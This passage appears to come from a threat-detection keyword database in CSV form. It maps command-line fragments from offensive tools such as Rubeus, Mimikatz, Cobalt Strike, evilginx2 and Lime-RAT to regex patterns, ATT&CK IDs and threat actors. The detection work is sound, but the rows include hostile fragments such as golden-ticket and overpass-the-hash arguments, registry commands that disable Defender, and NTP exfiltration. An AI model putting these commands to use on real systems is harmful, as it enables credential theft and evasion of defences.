"* /ticket:* /autoenterprise *",".{0,1000}\s\/ticket\:.{0,1000}\s\/autoenterprise\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","105"
"* /ticket:* /service:* /targetdomain:* /targetdc:*",".{0,1000}\s\/ticket\:.{0,1000}\s\/service\:.{0,1000}\s\/targetdomain\:.{0,1000}\s\/targetdc\:.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","106"
"* /ticket:*.kirbi*",".{0,1000}\s\/ticket\:.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","107"
"* /tn LimeRAT-Admin *",".{0,1000}\s\/tn\sLimeRAT\-Admin\s.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#scheduledtask","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","108"
"* /user:* /domain:* /aes256:* /run:powershell.exe*",".{0,1000}\s\/user\:.{0,1000}\s\/domain\:.{0,1000}\s\/aes256\:.{0,1000}\s\/run\:powershell\.exe.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Mimikatz  Overpass-the-hash a more opsec-safe version that uses the AES256 key (similar to with Rubeus above) - works for multiple Mimikatz commands","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","N/A","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","109"
"* /user:* /domain:* /ntlm:* /run:powershell.exe*",".{0,1000}\s\/user\:.{0,1000}\s\/domain\:.{0,1000}\s\/ntlm\:.{0,1000}\s\/run\:powershell\.exe.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Mimikatz Overpass-the-hash (more risky than Rubeus writes to LSASS memory)","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","N/A","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","110"
"* /user:* /domain:* /sid:S-1-5-21-* /krbtgt:* /id:* /groups:* /startoffset:0 /endin:600 /renewmax:10080 /ptt*",".{0,1000}\s\/user\:.{0,1000}\s\/domain\:.{0,1000}\s\/sid\:S\-1\-5\-21\-.{0,1000}\s\/krbtgt\:.{0,1000}\s\/id\:.{0,1000}\s\/groups\:.{0,1000}\s\/startoffset\:0\s\/endin\:600\s\/renewmax\:10080\s\/ptt.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Mimikatz Golden ticket (domain admin w/ some ticket properties to avoid detection)","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","N/A","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","111"
"* /user:* /password:* /enctype:* /opsec /ptt*",".{0,1000}\s\/user\:.{0,1000}\s\/password\:.{0,1000}\s\/enctype\:.{0,1000}\s\/opsec\s\/ptt.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","112"
"* /usetgtdeleg *",".{0,1000}\s\/usetgtdeleg\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","113"
"* /v DisableAntiSpyware /t REG_DWORD /d 1 /f*",".{0,1000}\s\/v\sDisableAntiSpyware\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","#registry","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","122"
"* /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f*",".{0,1000}\s\/v\sDisableBehaviorMonitoring\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","#registry","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","123"
"* /v DisableIOAVProtection /t REG_DWORD /d 1 /f*",".{0,1000}\s\/v\sDisableIOAVProtection\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","#registry","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","124"
"* /v DisableOnAccessProtection /t REG_DWORD /d 1 /f*",".{0,1000}\s\/v\sDisableOnAccessProtection\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","#registry","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","125"
"* /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f*",".{0,1000}\s\/v\sDisableScanOnRealtimeEnable\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","#registry","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","127"
"* :Failed to make full encrypt*",".{0,1000}\s\:Failed\sto\smake\sfull\sencrypt.{0,1000}","offensive_tool_keyword","Akira","Akira ransomware Windows payload","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#content","N/A","10","4","357","52","2025-04-22T10:00:56Z","2021-07-28T21:00:52Z","129"
"* [+] SUCCESS: AMSI Bypassed!*",".{0,1000}\s\[\+\]\sSUCCESS\:\sAMSI\sBypassed!.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#content","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","130"
"*- {phish_sub: *",".{0,1000}\-\s\{phish_sub\:\s.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/Evilginx2-Phishlets","1","0","#content","N/A","10","7","670","263","2025-02-06T02:46:16Z","2020-05-13T05:58:43Z","132"
"* | ./send -d *:123 -tM 0 -tm 0*",".{0,1000}\s\|\s\.\/send\s\-d\s.{0,1000}\:123\s\-tM\s0\s\-tm\s0.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","Black Basta","Data Exfiltration","https://github.com/evallen/ntpescape","1","0","#linux","N/A","10","2","138","15","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z","133"
"* | Find-AmsiSignatures*",".{0,1000}\s\|\sFind\-AmsiSignatures.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","135"
"* | NTLMParse*",".{0,1000}\s\|\sNTLMParse.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","Black Basta","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","0","N/A","N/A","10","2","179","15","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z","136"
"* | Test-ContainsAmsiSignatures*",".{0,1000}\s\|\sTest\-ContainsAmsiSignatures.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","137"
"* <PPID to spoof>\n\n*",".{0,1000}\s\<PPID\sto\sspoof\>\\n\\n.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","139"
"* = ""KRBRELAYUP""*",".{0,1000}\s\=\s\""KRBRELAYUP\"".{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","140"
"* = ""NeverGonnaRunAroundAndDesertYou""*",".{0,1000}\s\=\s\""NeverGonnaRunAroundAndDesertYou\"".{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/cube0x0/CVE-2021-1675","1","0","#content","N/A","10","10","1879","582","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z","141"
"* = [H,O,A,X,S,H,E,L,L]*",".{0,1000}\s\=\s\[H,O,A,X,S,H,E,L,L\].{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","142"
"* > \\127.0.0.1\ADMIN$\__* 2>&1",".{0,1000}\s\>\s\\\\127\.0\.0\.1\\ADMIN\$\\__.{0,1000}\s2\>\&1","offensive_tool_keyword","malware","Destructive Malware targeting organizations","T1486 - T1059","TA0008","N/A","N/A","Ransomware","https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","144"
"* > \\127.0.0.1\ADMIN$\__16* 2>&1*",".{0,1000}\s\>\s\\\\127\.0\.0\.1\\ADMIN\$\\__16.{0,1000}\s2\>\&1.{0,1000}","offensive_tool_keyword","wmiexec","potential wmiexec commandline pattern","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","N/A","7","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","145"
"* > \\127.0.0.1\ADMIN$\__17* 2>&1*",".{0,1000}\s\>\s\\\\127\.0\.0\.1\\ADMIN\$\\__17.{0,1000}\s2\>\&1.{0,1000}","offensive_tool_keyword","wmiexec","potential wmiexec commandline pattern","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","N/A","7","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","146"
"* --> GetWindowsAnti-VirusSoftware*",".{0,1000}\s\-\-\>\sGetWindowsAnti\-VirusSoftware.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","#content","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","147"
"* --> GetWindowsKernelExploitsKB*",".{0,1000}\s\-\-\>\sGetWindowsKernelExploitsKB.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","#content","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","148"
"* > Wi-Fi-PASS*",".{0,1000}\s\>\sWi\-Fi\-PASS.{0,1000}","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","149"
"* 0.0.0.0:8080 --threads*",".{0,1000}\s0\.0\.0\.0\:8080\s\-\-threads.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","N/A","10","10","1588","477","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z","151"
"* 0x* - HOOK DETECTED*",".{0,1000}\s.{0,1000}\s0x.{0,1000}\s\-\sHOOK\sDETECTED.{0,1000}","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","152"
"* 1$a$$.exe*",".{0,1000}\s1\$a\$\$\.exe.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","153"
"* 1.2.3.4:8080*",".{0,1000}\s1\.2\.3\.4\:8080.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","154"
"* 11_Credentials.py*",".{0,1000}\s11_Credentials\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","155"
"* 13_NoseyParker.py*",".{0,1000}\s13_NoseyParker\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","156"
"* 17_Custom_Cracklist.py*",".{0,1000}\s17_Custom_Cracklist\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","157"
"* 2>&1 && certutil -encodehex -f * && for /F ""usebackq"" * reg add HKLM\*","\s.{0,1000}\s2\>\&1\s\&\&\scertutil\s\-encodehex\s\-f\s.{0,1000}\s\&\&\sfor\s\/F\s\""usebackq\""\s.{0,1000}\sreg\sadd\sHKLM\\.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#registry","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","158"
"* 29ABE9Hy.log*",".{0,1000}\s29ABE9Hy\.log.{0,1000}","offensive_tool_keyword","blindsight","Red teaming tool to dump LSASS memory, bypassing basic countermeasures","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/0xdea/blindsight","1","0","N/A","N/A","10","3","225","26","2024-12-31T15:28:15Z","2024-07-18T07:35:43Z","159"
"* 365-Stealer *",".{0,1000}\s365\-Stealer\s.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","160"
"* 4444 meter*",".{0,1000}\s4444\smeter","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","161"
"* 4444 shell*",".{0,1000}\s4444\sshell","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - 